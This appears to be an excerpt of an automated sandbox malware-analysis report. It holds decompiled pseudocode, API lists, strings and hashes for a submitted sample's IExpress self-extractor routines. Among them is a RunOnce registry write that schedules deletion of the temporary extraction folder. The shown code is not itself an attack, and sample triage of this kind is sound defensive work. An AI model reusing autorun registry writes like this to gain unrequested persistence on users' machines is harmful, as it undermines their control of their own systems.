                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1c5605e96eac45e000f28b202c3b8037a59d93b502a5aa089fe9ac531e547ef1
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D831E97E284301BBEB209FA9FC0DE2B7A75E7D6B01F104615F602952B1CB768912DB51
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 50%
                                                                                                                                                                                                                                            			E00A44224(char __ecx) {
                                                                                                                                                                                                                                            				char* _v8;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v12;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v16;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _v20;
                                                                                                                                                                                                                                            				char* _v28;
                                                                                                                                                                                                                                            				intOrPtr _v32;
                                                                                                                                                                                                                                            				intOrPtr _v36;
                                                                                                                                                                                                                                            				intOrPtr _v40;
                                                                                                                                                                                                                                            				char _v44;
                                                                                                                                                                                                                                            				char _v48;
                                                                                                                                                                                                                                            				char _v52;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t26;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t28;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t29;
                                                                                                                                                                                                                                            				_Unknown_base(*)()* _t32;
                                                                                                                                                                                                                                            				char _t42;
                                                                                                                                                                                                                                            				char* _t44;
                                                                                                                                                                                                                                            				char* _t61;
                                                                                                                                                                                                                                            				void* _t63;
                                                                                                                                                                                                                                            				char* _t65;
                                                                                                                                                                                                                                            				struct HINSTANCE__* _t66;
                                                                                                                                                                                                                                            				char _t67;
                                                                                                                                                                                                                                            				void* _t71;
                                                                                                                                                                                                                                            				char _t76;
                                                                                                                                                                                                                                            				intOrPtr _t85;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t67 = __ecx;
                                                                                                                                                                                                                                            				_t66 = LoadLibraryA("SHELL32.DLL");
                                                                                                                                                                                                                                            				if(_t66 == 0) {
                                                                                                                                                                                                                                            					_t63 = 0x4c2;
                                                                                                                                                                                                                                            					L22:
                                                                                                                                                                                                                                            					E00A444B9(_t67, _t63, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                            					return 0;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t26 = GetProcAddress(_t66, "SHBrowseForFolder");
                                                                                                                                                                                                                                            				_v12 = _t26;
                                                                                                                                                                                                                                            				if(_t26 == 0) {
                                                                                                                                                                                                                                            					L20:
                                                                                                                                                                                                                                            					FreeLibrary(_t66);
                                                                                                                                                                                                                                            					_t63 = 0x4c1;
                                                                                                                                                                                                                                            					goto L22;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t28 = GetProcAddress(_t66, 0xc3);
                                                                                                                                                                                                                                            				_v20 = _t28;
                                                                                                                                                                                                                                            				if(_t28 == 0) {
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t29 = GetProcAddress(_t66, "SHGetPathFromIDList");
                                                                                                                                                                                                                                            				_v16 = _t29;
                                                                                                                                                                                                                                            				if(_t29 == 0) {
                                                                                                                                                                                                                                            					goto L20;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				_t76 =  *0xa488c0; // 0x0
                                                                                                                                                                                                                                            				if(_t76 != 0) {
                                                                                                                                                                                                                                            					L10:
                                                                                                                                                                                                                                            					 *0xa487a0 = 0;
                                                                                                                                                                                                                                            					_v52 = _t67;
                                                                                                                                                                                                                                            					_v48 = 0;
                                                                                                                                                                                                                                            					_v44 = 0;
                                                                                                                                                                                                                                            					_v40 = 0xa48598;
                                                                                                                                                                                                                                            					_v36 = 1;
                                                                                                                                                                                                                                            					_v32 = E00A44200;
                                                                                                                                                                                                                                            					_v28 = 0xa488c0;
                                                                                                                                                                                                                                            					 *0xa4a288( &_v52);
                                                                                                                                                                                                                                            					_t32 =  *_v12();
                                                                                                                                                                                                                                            					if(_t71 != _t71) {
                                                                                                                                                                                                                                            						asm("int 0x29");
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_v12 = _t32;
                                                                                                                                                                                                                                            					if(_t32 != 0) {
                                                                                                                                                                                                                                            						 *0xa4a288(_t32, 0xa488c0);
                                                                                                                                                                                                                                            						 *_v16();
                                                                                                                                                                                                                                            						if(_t71 != _t71) {
                                                                                                                                                                                                                                            							asm("int 0x29");
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						if( *0xa488c0 != 0) {
                                                                                                                                                                                                                                            							E00A41680(0xa487a0, 0x104, 0xa488c0);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						 *0xa4a288(_v12);
                                                                                                                                                                                                                                            						 *_v20();
                                                                                                                                                                                                                                            						if(_t71 != _t71) {
                                                                                                                                                                                                                                            							asm("int 0x29");
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					FreeLibrary(_t66);
                                                                                                                                                                                                                                            					_t85 =  *0xa487a0; // 0x0
                                                                                                                                                                                                                                            					return 0 | _t85 != 0x00000000;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					GetTempPathA(0x104, 0xa488c0);
                                                                                                                                                                                                                                            					_t61 = 0xa488c0;
                                                                                                                                                                                                                                            					_t4 =  &(_t61[1]); // 0xa488c1
                                                                                                                                                                                                                                            					_t65 = _t4;
                                                                                                                                                                                                                                            					do {
                                                                                                                                                                                                                                            						_t42 =  *_t61;
                                                                                                                                                                                                                                            						_t61 =  &(_t61[1]);
                                                                                                                                                                                                                                            					} while (_t42 != 0);
                                                                                                                                                                                                                                            					_t5 = _t61 - _t65 + 0xa488c0; // 0x1491181
                                                                                                                                                                                                                                            					_t44 = CharPrevA(0xa488c0, _t5);
                                                                                                                                                                                                                                            					_v8 = _t44;
                                                                                                                                                                                                                                            					if( *_t44 == 0x5c &&  *(CharPrevA(0xa488c0, _t44)) != 0x3a) {
                                                                                                                                                                                                                                            						 *_v8 = 0;
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					goto L10;
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            			}




























                                                                                                                                                                                                                                            0x00a44234
                                                                                                                                                                                                                                            0x00a4423c
                                                                                                                                                                                                                                            0x00a44240
                                                                                                                                                                                                                                            0x00a443b2
                                                                                                                                                                                                                                            0x00a443b7
                                                                                                                                                                                                                                            0x00a443c0
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a443c5
                                                                                                                                                                                                                                            0x00a4424c
                                                                                                                                                                                                                                            0x00a44252
                                                                                                                                                                                                                                            0x00a44257
                                                                                                                                                                                                                                            0x00a443a4
                                                                                                                                                                                                                                            0x00a443a5
                                                                                                                                                                                                                                            0x00a443ab
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a443ab
                                                                                                                                                                                                                                            0x00a44263
                                                                                                                                                                                                                                            0x00a44269
                                                                                                                                                                                                                                            0x00a4426e
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4427a
                                                                                                                                                                                                                                            0x00a44280
                                                                                                                                                                                                                                            0x00a44285
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4428d
                                                                                                                                                                                                                                            0x00a44293
                                                                                                                                                                                                                                            0x00a442e6
                                                                                                                                                                                                                                            0x00a442e9
                                                                                                                                                                                                                                            0x00a442ef
                                                                                                                                                                                                                                            0x00a442f4
                                                                                                                                                                                                                                            0x00a442f7
                                                                                                                                                                                                                                            0x00a44300
                                                                                                                                                                                                                                            0x00a44307
                                                                                                                                                                                                                                            0x00a4430e
                                                                                                                                                                                                                                            0x00a44315
                                                                                                                                                                                                                                            0x00a4431c
                                                                                                                                                                                                                                            0x00a44322
                                                                                                                                                                                                                                            0x00a44326
                                                                                                                                                                                                                                            0x00a4432d
                                                                                                                                                                                                                                            0x00a4432d
                                                                                                                                                                                                                                            0x00a4432f
                                                                                                                                                                                                                                            0x00a44334
                                                                                                                                                                                                                                            0x00a44343
                                                                                                                                                                                                                                            0x00a44349
                                                                                                                                                                                                                                            0x00a4434d
                                                                                                                                                                                                                                            0x00a44354
                                                                                                                                                                                                                                            0x00a44354
                                                                                                                                                                                                                                            0x00a4435d
                                                                                                                                                                                                                                            0x00a4436e
                                                                                                                                                                                                                                            0x00a4436e
                                                                                                                                                                                                                                            0x00a4437d
                                                                                                                                                                                                                                            0x00a44383
                                                                                                                                                                                                                                            0x00a44387
                                                                                                                                                                                                                                            0x00a4438e
                                                                                                                                                                                                                                            0x00a4438e
                                                                                                                                                                                                                                            0x00a44387
                                                                                                                                                                                                                                            0x00a44391
                                                                                                                                                                                                                                            0x00a44399
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a44295
                                                                                                                                                                                                                                            0x00a4429f
                                                                                                                                                                                                                                            0x00a442a5
                                                                                                                                                                                                                                            0x00a442aa
                                                                                                                                                                                                                                            0x00a442aa
                                                                                                                                                                                                                                            0x00a442ad
                                                                                                                                                                                                                                            0x00a442ad
                                                                                                                                                                                                                                            0x00a442af
                                                                                                                                                                                                                                            0x00a442b0
                                                                                                                                                                                                                                            0x00a442b6
                                                                                                                                                                                                                                            0x00a442c2
                                                                                                                                                                                                                                            0x00a442c8
                                                                                                                                                                                                                                            0x00a442ce
                                                                                                                                                                                                                                            0x00a442e4
                                                                                                                                                                                                                                            0x00a442e4
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a442ce

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • LoadLibraryA.KERNEL32(SHELL32.DLL,?,?,00000001), ref: 00A44236
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHBrowseForFolder), ref: 00A4424C
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,000000C3), ref: 00A44263
                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000,SHGetPathFromIDList), ref: 00A4427A
                                                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,00A488C0,?,00000001), ref: 00A4429F
                                                                                                                                                                                                                                            • CharPrevA.USER32(00A488C0,01491181,?,00000001), ref: 00A442C2
                                                                                                                                                                                                                                            • CharPrevA.USER32(00A488C0,00000000,?,00000001), ref: 00A442D6
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00A44391
                                                                                                                                                                                                                                            • FreeLibrary.KERNEL32(00000000,?,00000001), ref: 00A443A5
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
                                                                                                                                                                                                                                            • String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
                                                                                                                                                                                                                                            • API String ID: 1865808269-1731843650
                                                                                                                                                                                                                                            • Opcode ID: 8c750b8000dc8dba626b6a717ed003ff40b4564e42f7aa327f63fe838ebb37bd
                                                                                                                                                                                                                                            • Instruction ID: 961d72bb1aa91893095dade8bc53a5966426eff861642e5faa87fe680fc5dbba
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8c750b8000dc8dba626b6a717ed003ff40b4564e42f7aa327f63fe838ebb37bd
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D741187CA40204EFD711EFB4EC94BAE7BB4EBCA784F140569E941A7251CBB98D02C761
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 94%
                                                                                                                                                                                                                                            			E00A42773(CHAR* __ecx, char* _a4) {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v269;
                                                                                                                                                                                                                                            				CHAR* _v276;
                                                                                                                                                                                                                                            				int _v280;
                                                                                                                                                                                                                                            				void* _v284;
                                                                                                                                                                                                                                            				int _v288;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t23;
                                                                                                                                                                                                                                            				intOrPtr _t34;
                                                                                                                                                                                                                                            				int _t45;
                                                                                                                                                                                                                                            				int* _t50;
                                                                                                                                                                                                                                            				CHAR* _t52;
                                                                                                                                                                                                                                            				CHAR* _t61;
                                                                                                                                                                                                                                            				char* _t62;
                                                                                                                                                                                                                                            				int _t63;
                                                                                                                                                                                                                                            				CHAR* _t64;
                                                                                                                                                                                                                                            				signed int _t65;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t52 = __ecx;
                                                                                                                                                                                                                                            				_t23 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_v8 = _t23 ^ _t65;
                                                                                                                                                                                                                                            				_t62 = _a4;
                                                                                                                                                                                                                                            				_t50 = 0;
                                                                                                                                                                                                                                            				_t61 = __ecx;
                                                                                                                                                                                                                                            				_v276 = _t62;
                                                                                                                                                                                                                                            				 *((char*)(__ecx)) = 0;
                                                                                                                                                                                                                                            				if( *_t62 != 0x23) {
                                                                                                                                                                                                                                            					_t63 = 0x104;
                                                                                                                                                                                                                                            					goto L14;
                                                                                                                                                                                                                                            				} else {
                                                                                                                                                                                                                                            					_t64 = _t62 + 1;
                                                                                                                                                                                                                                            					_v269 = CharUpperA( *_t64);
                                                                                                                                                                                                                                            					_v276 = CharNextA(CharNextA(_t64));
                                                                                                                                                                                                                                            					_t63 = 0x104;
                                                                                                                                                                                                                                            					_t34 = _v269;
                                                                                                                                                                                                                                            					if(_t34 == 0x53) {
                                                                                                                                                                                                                                            						L14:
                                                                                                                                                                                                                                            						GetSystemDirectoryA(_t61, _t63);
                                                                                                                                                                                                                                            						goto L15;
                                                                                                                                                                                                                                            					} else {
                                                                                                                                                                                                                                            						if(_t34 == 0x57) {
                                                                                                                                                                                                                                            							GetWindowsDirectoryA(_t61, 0x104);
                                                                                                                                                                                                                                            							goto L16;
                                                                                                                                                                                                                                            						} else {
                                                                                                                                                                                                                                            							_push(_t52);
                                                                                                                                                                                                                                            							_v288 = 0x104;
                                                                                                                                                                                                                                            							E00A41781( &_v268, 0x104, _t52, "Software\\Microsoft\\Windows\\CurrentVersion\\App Paths");
                                                                                                                                                                                                                                            							_t59 = 0x104;
                                                                                                                                                                                                                                            							E00A4658A( &_v268, 0x104, _v276);
                                                                                                                                                                                                                                            							if(RegOpenKeyExA(0x80000002,  &_v268, 0, 0x20019,  &_v284) != 0) {
                                                                                                                                                                                                                                            								L16:
                                                                                                                                                                                                                                            								_t59 = _t63;
                                                                                                                                                                                                                                            								E00A4658A(_t61, _t63, _v276);
                                                                                                                                                                                                                                            							} else {
                                                                                                                                                                                                                                            								if(RegQueryValueExA(_v284, 0xa41140, 0,  &_v280, _t61,  &_v288) == 0) {
                                                                                                                                                                                                                                            									_t45 = _v280;
                                                                                                                                                                                                                                            									if(_t45 != 2) {
                                                                                                                                                                                                                                            										L9:
                                                                                                                                                                                                                                            										if(_t45 == 1) {
                                                                                                                                                                                                                                            											goto L10;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									} else {
                                                                                                                                                                                                                                            										if(ExpandEnvironmentStringsA(_t61,  &_v268, 0x104) == 0) {
                                                                                                                                                                                                                                            											_t45 = _v280;
                                                                                                                                                                                                                                            											goto L9;
                                                                                                                                                                                                                                            										} else {
                                                                                                                                                                                                                                            											_t59 = 0x104;
                                                                                                                                                                                                                                            											E00A41680(_t61, 0x104,  &_v268);
                                                                                                                                                                                                                                            											L10:
                                                                                                                                                                                                                                            											_t50 = 1;
                                                                                                                                                                                                                                            										}
                                                                                                                                                                                                                                            									}
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            								RegCloseKey(_v284);
                                                                                                                                                                                                                                            								L15:
                                                                                                                                                                                                                                            								if(_t50 == 0) {
                                                                                                                                                                                                                                            									goto L16;
                                                                                                                                                                                                                                            								}
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A46CE0(1, _t50, _v8 ^ _t65, _t59, _t61, _t63);
                                                                                                                                                                                                                                            			}























                                                                                                                                                                                                                                            0x00a42773
                                                                                                                                                                                                                                            0x00a4277e
                                                                                                                                                                                                                                            0x00a42785
                                                                                                                                                                                                                                            0x00a4278a
                                                                                                                                                                                                                                            0x00a4278d
                                                                                                                                                                                                                                            0x00a42790
                                                                                                                                                                                                                                            0x00a42792
                                                                                                                                                                                                                                            0x00a42798
                                                                                                                                                                                                                                            0x00a4279d
                                                                                                                                                                                                                                            0x00a428b2
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a427a3
                                                                                                                                                                                                                                            0x00a427a3
                                                                                                                                                                                                                                            0x00a427af
                                                                                                                                                                                                                                            0x00a427c2
                                                                                                                                                                                                                                            0x00a427c8
                                                                                                                                                                                                                                            0x00a427cd
                                                                                                                                                                                                                                            0x00a427d5
                                                                                                                                                                                                                                            0x00a428b7
                                                                                                                                                                                                                                            0x00a428b9
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a427db
                                                                                                                                                                                                                                            0x00a427dd
                                                                                                                                                                                                                                            0x00a428aa
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a427e3
                                                                                                                                                                                                                                            0x00a427e3
                                                                                                                                                                                                                                            0x00a427ec
                                                                                                                                                                                                                                            0x00a427f8
                                                                                                                                                                                                                                            0x00a42803
                                                                                                                                                                                                                                            0x00a4280b
                                                                                                                                                                                                                                            0x00a42831
                                                                                                                                                                                                                                            0x00a428c3
                                                                                                                                                                                                                                            0x00a428c9
                                                                                                                                                                                                                                            0x00a428cd
                                                                                                                                                                                                                                            0x00a42837
                                                                                                                                                                                                                                            0x00a4285a
                                                                                                                                                                                                                                            0x00a4285c
                                                                                                                                                                                                                                            0x00a42865
                                                                                                                                                                                                                                            0x00a42892
                                                                                                                                                                                                                                            0x00a42895
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a42867
                                                                                                                                                                                                                                            0x00a42878
                                                                                                                                                                                                                                            0x00a4288c
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a4287a
                                                                                                                                                                                                                                            0x00a42880
                                                                                                                                                                                                                                            0x00a42885
                                                                                                                                                                                                                                            0x00a42897
                                                                                                                                                                                                                                            0x00a42899
                                                                                                                                                                                                                                            0x00a42899
                                                                                                                                                                                                                                            0x00a42878
                                                                                                                                                                                                                                            0x00a42865
                                                                                                                                                                                                                                            0x00a428a0
                                                                                                                                                                                                                                            0x00a428bf
                                                                                                                                                                                                                                            0x00a428c1
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                                            0x00a428c1
                                                                                                                                                                                                                                            0x00a42831
                                                                                                                                                                                                                                            0x00a427dd
                                                                                                                                                                                                                                            0x00a427d5
                                                                                                                                                                                                                                            0x00a428e5

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • CharUpperA.USER32(173B1603,00000000,00000000,00000000), ref: 00A427A8
                                                                                                                                                                                                                                            • CharNextA.USER32(0000054D), ref: 00A427B5
                                                                                                                                                                                                                                            • CharNextA.USER32(00000000), ref: 00A427BC
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,?,00000000,00020019,?,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A42829
                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,00A41140,00000000,?,-00000005,?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A42852
                                                                                                                                                                                                                                            • ExpandEnvironmentStringsA.KERNEL32(-00000005,?,00000104,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A42870
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,Software\Microsoft\Windows\CurrentVersion\App Paths), ref: 00A428A0
                                                                                                                                                                                                                                            • GetWindowsDirectoryA.KERNEL32(-00000005,00000104), ref: 00A428AA
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 00A428B9
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00A427E4
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352961042.0000000000A4C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_a40000_21fvBVFMsn.jbxd
                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                            • API ID: Char$DirectoryNext$CloseEnvironmentExpandOpenQueryStringsSystemUpperValueWindows
                                                                                                                                                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
                                                                                                                                                                                                                                            • API String ID: 2659952014-2428544900
                                                                                                                                                                                                                                            • Opcode ID: 48797b4fc39e517b4448839076e9c5febf20ae91408de87f06ff830d334149f7
                                                                                                                                                                                                                                            • Instruction ID: 6a45c44c9e2e197125aaa7b2deaff82f0fb53205bdabdd1483a97b52a5b81b67
                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 48797b4fc39e517b4448839076e9c5febf20ae91408de87f06ff830d334149f7
                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AF41A379A4012CAFDB249B649C85BEE7BBDEFE6700F4040A9F545D2101DB708E868FA1
                                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                                            C-Code - Quality: 62%
                                                                                                                                                                                                                                            			E00A42267() {
                                                                                                                                                                                                                                            				signed int _v8;
                                                                                                                                                                                                                                            				char _v268;
                                                                                                                                                                                                                                            				char _v836;
                                                                                                                                                                                                                                            				void* _v840;
                                                                                                                                                                                                                                            				int _v844;
                                                                                                                                                                                                                                            				void* __ebx;
                                                                                                                                                                                                                                            				void* __edi;
                                                                                                                                                                                                                                            				void* __esi;
                                                                                                                                                                                                                                            				signed int _t19;
                                                                                                                                                                                                                                            				intOrPtr _t33;
                                                                                                                                                                                                                                            				void* _t38;
                                                                                                                                                                                                                                            				intOrPtr* _t42;
                                                                                                                                                                                                                                            				void* _t45;
                                                                                                                                                                                                                                            				void* _t47;
                                                                                                                                                                                                                                            				void* _t49;
                                                                                                                                                                                                                                            				signed int _t51;
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            				_t19 =  *0xa48004; // 0x173b1603
                                                                                                                                                                                                                                            				_t20 = _t19 ^ _t51;
                                                                                                                                                                                                                                            				_v8 = _t19 ^ _t51;
                                                                                                                                                                                                                                            				if( *0xa48530 != 0) {
                                                                                                                                                                                                                                            					_push(_t49);
                                                                                                                                                                                                                                            					if(RegOpenKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0x2001f,  &_v840) == 0) {
                                                                                                                                                                                                                                            						_push(_t38);
                                                                                                                                                                                                                                            						_v844 = 0x238;
                                                                                                                                                                                                                                            						if(RegQueryValueExA(_v840, ?str?, 0, 0,  &_v836,  &_v844) == 0) {
                                                                                                                                                                                                                                            							_push(_t47);
                                                                                                                                                                                                                                            							memset( &_v268, 0, 0x104);
                                                                                                                                                                                                                                            							if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                                                            								E00A4658A( &_v268, 0x104, 0xa41140);
                                                                                                                                                                                                                                            							}
                                                                                                                                                                                                                                            							_push("C:\Users\hardz\AppData\Local\Temp\IXP000.TMP\");
                                                                                                                                                                                                                                            							E00A4171E( &_v836, 0x238, "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"",  &_v268);
                                                                                                                                                                                                                                            							_t42 =  &_v836;
                                                                                                                                                                                                                                            							_t45 = _t42 + 1;
                                                                                                                                                                                                                                            							_pop(_t47);
                                                                                                                                                                                                                                            							do {
                                                                                                                                                                                                                                            								_t33 =  *_t42;
                                                                                                                                                                                                                                            								_t42 = _t42 + 1;
                                                                                                                                                                                                                                            							} while (_t33 != 0);
                                                                                                                                                                                                                                            							RegSetValueExA(_v840, "wextract_cleanup0", 0, 1,  &_v836, _t42 - _t45 + 1);
                                                                                                                                                                                                                                            						}
                                                                                                                                                                                                                                            						_t20 = RegCloseKey(_v840);
                                                                                                                                                                                                                                            						_pop(_t38);
                                                                                                                                                                                                                                            					}
                                                                                                                                                                                                                                            					_pop(_t49);
                                                                                                                                                                                                                                            				}
                                                                                                                                                                                                                                            				return E00A46CE0(_t20, _t38, _v8 ^ _t51, _t45, _t47, _t49);
                                                                                                                                                                                                                                            			}



















                                                                                                                                                                                                                                            0x00a42272
                                                                                                                                                                                                                                            0x00a42277
                                                                                                                                                                                                                                            0x00a42279
                                                                                                                                                                                                                                            0x00a42283
                                                                                                                                                                                                                                            0x00a42289
                                                                                                                                                                                                                                            0x00a422ab
                                                                                                                                                                                                                                            0x00a422b1
                                                                                                                                                                                                                                            0x00a422c4
                                                                                                                                                                                                                                            0x00a422e0
                                                                                                                                                                                                                                            0x00a422e6
                                                                                                                                                                                                                                            0x00a422f5
                                                                                                                                                                                                                                            0x00a4230d
                                                                                                                                                                                                                                            0x00a4231c
                                                                                                                                                                                                                                            0x00a4231c
                                                                                                                                                                                                                                            0x00a42321
                                                                                                                                                                                                                                            0x00a4233a
                                                                                                                                                                                                                                            0x00a42342
                                                                                                                                                                                                                                            0x00a42348
                                                                                                                                                                                                                                            0x00a4234b
                                                                                                                                                                                                                                            0x00a4234c
                                                                                                                                                                                                                                            0x00a4234c
                                                                                                                                                                                                                                            0x00a4234e
                                                                                                                                                                                                                                            0x00a4234f
                                                                                                                                                                                                                                            0x00a4236e
                                                                                                                                                                                                                                            0x00a4236e
                                                                                                                                                                                                                                            0x00a4237a
                                                                                                                                                                                                                                            0x00a42380
                                                                                                                                                                                                                                            0x00a42380
                                                                                                                                                                                                                                            0x00a42381
                                                                                                                                                                                                                                            0x00a42381
                                                                                                                                                                                                                                            0x00a4238f

                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\RunOnce,00000000,0002001F,?,00000001), ref: 00A422A3
                                                                                                                                                                                                                                            • RegQueryValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000000,?,?,00000001), ref: 00A422D8
                                                                                                                                                                                                                                            • memset.MSVCRT ref: 00A422F5
                                                                                                                                                                                                                                            • GetSystemDirectoryA.KERNEL32 ref: 00A42305
                                                                                                                                                                                                                                            • RegSetValueExA.ADVAPI32(?,wextract_cleanup0,00000000,00000001,?,?,?,?,?,?,?,?,?), ref: 00A4236E
                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 00A4237A
                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                            • C:\Users\user\AppData\Local\Temp\IXP000.TMP\, xrefs: 00A42321
                                                                                                                                                                                                                                            • wextract_cleanup0, xrefs: 00A4227C, 00A422CD, 00A42363
                                                                                                                                                                                                                                            • rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 00A4232D
                                                                                                                                                                                                                                            • Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00A42299
                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                            • Source File: 00000000.00000002.352918915.0000000000A41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00A40000, based on PE: true
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352907150.0000000000A40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                            • Associated: 00000000.00000002.352946994.0000000000A48000.00000004.00000001.01000000.00000003.sdmpDownload File
